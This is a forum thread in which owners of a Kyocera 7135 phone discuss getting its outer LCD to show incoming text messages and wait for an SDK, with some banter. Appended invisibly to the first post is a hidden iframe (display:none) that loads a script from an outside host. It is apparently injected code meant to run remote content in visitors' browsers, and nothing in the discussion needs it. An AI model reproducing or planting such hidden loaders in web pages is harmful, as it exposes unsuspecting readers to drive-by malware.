+ Reply to Thread
Results 1 to 10 of 10
  1. #1
    Registered User
    Join Date
    12-25-2002
    Posts
    40

    Way to change the LCD display?

    I was wondering if anyone out there knew of a way to make the LCD display actually display text messages that are being sent to the phone.

    That way, when someone paged you using a text message with a call-back number, you could just look at the top of the phone like a pager and not have to flip it open and press the "messages" button.

    Or maybe someone out there will write some software to do that.

    Any thoughts would be appreciated.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184

    Re: Way to change the LCD display?

    Originally posted by Hannover
    I was wondering if anyone out there knew of a way to make the LCD display actually display text messages that are being sent to the phone.

    That way, when someone paged you using a text message with a call-back number, you could just look at the top of the phone like a pager and not have to flip it open and press the "messages" button.

    Or maybe someone out there will write some software to do that.

    Any thoughts would be appreciated.
    Kyo has not released the SDK yet. Several of us are hoping that there will be functions to provide access to the LCD and maybe even the LED. I think text messages scrolling on the LCD is on at least a few of our todo lists... I would also like an alarm clock that could flash the LCD backlight or the LED as a silent alarm (and if the SDK supports it, I am prepared to write the program..).

    Alan

  3. #3
    Registered User
    Join Date
    12-25-2002
    Posts
    40

    Re: Re: Way to change the LCD display?

    Originally posted by alanb
    Kyo has not released the SDK yet. Several of us are hoping that there will be functions to provide access to the LCD and maybe even the LED. I think text messages scrolling on the LCD is on at least a few of our todo lists... I would also like an alarm clock that could flash the LCD backlight or the LED as a silent alarm (and if the SDK supports it, I am prepared to write the program..).

    Alan
    Sounds great. If you do write something to make the LCD a scrolling text message display, please let me know!

    Thanks.

  4. #4
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184

    Re: Re: Re: Way to change the LCD display?

    Originally posted by Hannover
    Sounds great. If you do write something to make the LCD a scrolling text message display, please let me know!

    Thanks.
    Anything I manage to succesfully develop will be posted in the 7135 files section. I have benefited so much from free-ware/shareware over the years that I plan to release any utilities I develop as free-ware. (unless they are of direct use for my employer, in which case I'll need to discuss release policy with them first. Only one program on my todo list will be of use to them and the general populace, so probably not a big deal).

    Alan

  5. #5
    Registered User Steve's Avatar
    Join Date
    10-02-2002
    Posts
    1,694

    Re: Way to change the LCD display?

    Originally posted by Hannover
    I was wondering if anyone out there knew of a way to make the LCD display actually display text messages that are being sent to the phone.

    That way, when someone paged you using a text message with a call-back number, you could just look at the top of the phone like a pager and not have to flip it open and press the "messages" button.

    Or maybe someone out there will write some software to do that.

    Any thoughts would be appreciated.
    Sounds like a good idea.. you REALLY want a pager dont ya Hannover!

    Maybe we need after this hack is the sdk for the Volume buttons so you could control the scroll of the LCD messsages yourself without the flip!

    (btw what you got against the flip?)
    iPhone therefore iAm.

  6. #6
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    OMG, 180 character text message on the LCD.....I died of bordom waiting to read the whole thing

    I could have opened the flip, gotten to the message, and read it by then

  7. #7
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Although we will still need to wait and see what the SDK brings..... It looks like Palm apps can talk to the LCD. I had a databook alarm go off today and the LCD lit up and said "DateBook Ale" (short for Alert, I presume...) and the LED flashed 3 times!

    Alan

  8. #8
    poked back in
    Join Date
    11-19-2002
    Location
    Redmond, WA
    Posts
    358
    What are the version numbers of the "Basic 4" being that Handspring made theirs .1H?

  9. #9
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    Originally posted by alanb
    I had a databook alarm go off today and the LCD lit up and said "DateBook Ale" (short for Alert, I presume...) and the LED flashed 3 times!

    Mmmmmmmm "DateBook Ale"... that's my favorite beer!
    ~'kito
    pdaPhoneHome Moderator

  10. #10
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    C'mon, it's hardly my fault... it was begging to be said.
    ~'kito
    pdaPhoneHome Moderator

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts